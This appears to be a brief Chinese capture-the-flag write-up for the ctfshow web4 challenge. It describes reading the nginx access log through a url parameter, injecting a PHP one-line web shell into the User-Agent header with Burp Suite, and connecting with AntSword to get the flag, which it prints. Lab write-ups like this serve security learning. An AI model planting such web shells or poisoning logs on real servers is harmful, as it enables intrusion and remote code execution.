其他分享
首页 > 其他分享> > ctfshow-web4

ctfshow-web4

作者:互联网

 

 

 打开之后发现和web3有点像,但是用之前的方法做不出来了

 

 

传参url=/var/log/nginx/access.log获取日志目录

 

 

 使用burpsuite抓包

在User-Agent中加入一句话木马

<?php @eval($_POST['a'];?>

 

 

使用蚁剑连接

 

得到flag

 

 ctfshow{f755138b-0c50-4507-9cb2-67835c95ae08}

 

标签:log,传参,web4,burpsuite,Agent,67835c95ae08,ctfshow
来源: https://www.cnblogs.com/string-Xrx/p/15428874.html